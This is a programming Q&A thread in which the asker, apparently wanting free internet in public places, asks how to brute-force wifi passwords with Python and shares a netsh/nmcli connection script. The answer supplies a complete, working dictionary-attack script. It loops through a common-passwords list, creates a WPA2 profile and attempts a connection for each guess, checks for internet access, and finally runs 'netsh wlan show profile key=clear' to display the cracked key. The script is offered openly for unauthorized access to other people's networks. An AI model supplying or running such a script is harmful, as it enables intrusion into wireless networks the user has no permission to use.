How to Brute Force a wifi Password with python?

Question

When I’m in public I want to have access to the internet, so I’ve been writing a script to find wifi passwords for a while now. I found a way like “dictionary attack” that I don’t like. I found a script on the internet to connect to wifi using python:

import os
import platform
import getpass

y = "y"
Y = "Y"
n = "n"
N = "N"
def createNewConnection(name, SSID, key):
    config = """<?xml version=\"1.0\"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
    <name>"""+name+"""</name>
    <SSIDConfig>
        <SSID>
            <name>"""+SSID+"""</name>
        </SSID>
    </SSIDConfig>
    <connectionType>ESS</connectionType>
    <connectionMode>auto</connectionMode>
    <MSM>
        <security>
            <authEncryption>
                <authentication>WPA2PSK</authentication>
                <encryption>AES</encryption>
                <useOneX>false</useOneX>
            </authEncryption>
            <sharedKey>
                <keyType>passPhrase</keyType>
                <protected>false</protected>
                <keyMaterial>"""+key+"""</keyMaterial>
            </sharedKey>
        </security>
    </MSM>
</WLANProfile>"""
    if platform.system() == "Windows":
        command = "netsh wlan add profile filename=\""+name+".xml\""+" interface=Wi-Fi"
        with open(name+".xml", 'w') as file:
            file.write(config)
    elif platform.system() == "Linux":
        command = "nmcli dev wifi connect '"+SSID+"' password '"+key+"'"
    os.system(command)
    if platform.system() == "Windows":
        os.remove(name+".xml")

def connect(name, SSID):
    if platform.system() == "Windows":
        command = "netsh wlan connect name=\""+name+"\" ssid=\""+SSID+"\" interface=Wi-Fi"
    elif platform.system() == "Linux":
        command = "nmcli con up "+SSID
    os.system(command)

def displayAvailableNetworks():
    if platform.system() == "Windows":
        command = "netsh wlan show networks interface=Wi-Fi"
    elif platform.system() == "Linux":
        command = "nmcli dev wifi list"
    os.system(command)

try:
    displayAvailableNetworks()
    option = input("New connection (y/N)? ")
    if option == n or option == N:
        name = input("Name: ")
        connect(name, name)
        print("If you aren't connected to this network, try connecting with correct credentials")
    elif option == y or option == Y:
        name = input("Name: ")
        key = getpass.getpass("Password: ")
        createNewConnection(name, name, key)
        connect(name, name)
        print("If you aren't connected to this network, try connecting with correct credentials")
except KeyboardInterrupt as e:
    print("\nExiting...")

You have to enter the password yourself in this script.
In this line

key = getpass.getpass ("Password:")

I should switch "Password:" with variable that the script would try to search for until it is successful...
I found a script to find the password and completed it. The only problem is that in this script the program knows the value of the password. With each attempt, he can check if it matches the correct password.

import itertools
import string

def guess_password(real):
    chars = string.ascii_lowercase + string.digits
    attempts = 0
    for password_length in range(8, 9):
        for guess in itertools.product(chars, repeat=password_length):
            attempts += 1
            guess = ''.join(guess)
            if guess == real:
                return 'password is {}. found in {} guesses.'.format(guess, attempts)
            print(guess, attempts)

print(guess_password('abc'))

I should connect these two scripts but I don't know how. It is not clear to me how to find the value of a variable that is unknown- (password).
I would be very happy if someone could explain the above problem to me. I’m new to these things and they’re not the clearest to me. Thanks for the reply

Answer 1

I know i am late for this but i found another way that might work using your code.

It tries common passwords from a .txt file i got from gihub https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10k-most-common.txt

Here is the code.

import os
import platform
import time
import requests


url = "http://www.python.org"
timeout = 5
def createNewConnection(name, SSID, key):
    config = """<?xml version=\"1.0\"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
    <name>"""+name+"""</name>
    <SSIDConfig>
        <SSID>
            <name>"""+SSID+"""</name>
        </SSID>
    </SSIDConfig>
    <connectionType>ESS</connectionType>
    <connectionMode>auto</connectionMode>
    <MSM>
        <security>
            <authEncryption>
                <authentication>WPA2PSK</authentication>
                <encryption>AES</encryption>
                <useOneX>false</useOneX>
            </authEncryption>
            <sharedKey>
                <keyType>passPhrase</keyType>
                <protected>false</protected>
                <keyMaterial>"""+key+"""</keyMaterial>
            </sharedKey>
        </security>
    </MSM>
</WLANProfile>"""
    if platform.system() == "Windows":
        command = "netsh wlan add profile filename=\""+name+".xml\""+" interface=Wi-Fi"
        with open(name+".xml", 'w') as file:
            file.write(config)
    elif platform.system() == "Linux":
        command = "nmcli dev wifi connect '"+SSID+"' password '"+key+"'"
    os.system(command)
    if platform.system() == "Windows":
        os.remove(name+".xml")

def connect(name, SSID):
    os.system("netsh wlan connect name=\""+name+"\" ssid=\""+SSID+"\" interface=Wi-Fi")

def displayAvailableNetworks():
       os.system("netsh wlan show networks interface=Wi-Fi")

print("[LOADING] Searching if connected to any network")

try:
    request = requests.get(url, timeout=timeout)
    print("[-] Please disconnect your internet for this operation to work, try again later"), exit()
    
except (requests.ConnectionError, requests.Timeout) as exception:
    print("[LOADING] Loading program..."), time.sleep(1)

connected = True
while connected:
    try:
        displayAvailableNetworks()
        WIFI = input("WIFI Name: ")
        with open("Brute Force\passwords.txt", "r") as f:
            for line in f:
                words = line.split()
                if words:
                    print(f"Password: {words[0]}")
                    
                    createNewConnection(WIFI, WIFI, words[0])
                    connect(WIFI, WIFI)

                    try:
                        request = requests.get(url, timeout=timeout)
                        connected = False
                        choice = input(f"[+] The password might have been cracked, are you connected to {WIFI} (y/N) ? ")
                        if choice == "y":
                            print("\n[EXITING] Operation canceled")
                            exit()
                        elif choice == "n":
                            print("\n[-] Operation continues\n")
                        
                    except (requests.ConnectionError, requests.Timeout) as exception:
                        print("[LOADING] Loading program..."), time.sleep(1)

        print("[+] Operation complete")
        choice = input("See WIFI Information (y/N) ? ")
        if choice == "y" or "Y":
            print(f"[LOADING] Searching for {WIFI} network")
            time.sleep(1)
            os.system(f'netsh wlan show profile name="{WIFI}" key=clear')
            exit()
        elif choice == "n" or "N":
            print("\n[EXITING] Exiting program...")
            time.sleep(2)
            exit()

    except KeyboardInterrupt as e:
        print("\n[[EXITING] Aborting program...")
        exit()